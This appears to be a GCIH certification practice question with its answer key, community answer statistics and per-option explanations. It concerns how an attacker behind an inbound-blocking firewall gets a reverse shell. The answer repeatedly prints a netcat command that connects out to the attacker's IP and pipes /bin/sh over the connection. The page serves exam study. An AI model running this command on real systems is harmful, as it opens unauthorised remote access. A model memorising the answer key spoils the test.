GCIH · Question #802
An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic
The correct answer is C. nc 11.22.33.44 22 -e /bin/sh. A reverse shell has the compromised server initiate an outbound connection to the attacker, bypassing inbound firewall restrictions. Netcat with the -e flag achieves this by connecting out and piping a shell over the connection.
Question
An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic but allowing all outbound traffic. What command would he run on the server?
Options
- Atcpdump -nn port 22 and host 11.22.33.44
- Bssh -b 192.168.20.21 -p 22 11.22.33.44
- Cnc 11.22.33.44 22 -e /bin/sh
- Dlsof -i @192.168.20.21:22
How the community answered
(38 responses)- A8% (3)
- B3% (1)
- C84% (32)
- D5% (2)
Why each option
A reverse shell has the compromised server initiate an outbound connection to the attacker, bypassing inbound firewall restrictions. Netcat with the -e flag achieves this by connecting out and piping a shell over the connection.
tcpdump is a passive packet capture utility used for monitoring network traffic, not for establishing any type of interactive shell or remote connection.
The `ssh -b` flag binds the local address for an outbound SSH client connection - this would attempt to SSH into the attacker's machine rather than grant the attacker shell access to the server.
The command `nc 11.22.33.44 22 -e /bin/sh` uses netcat to initiate an outbound TCP connection from the server to the attacker on port 22 - permitted because all outbound traffic is allowed. The `-e /bin/sh` flag pipes the shell's stdin and stdout over the connection, giving the attacker an interactive shell on the server without requiring any inbound connection that the firewall would block.
lsof -i is a diagnostic command used to list currently open network connections and file descriptors, not a tool for creating or tunneling any remote shell.
Concept tested: Netcat reverse shell bypassing inbound firewall rules
Source: https://nmap.org/ncat/guide/ncat-shell.html
Topics
Community Discussion
No community discussion yet for this question.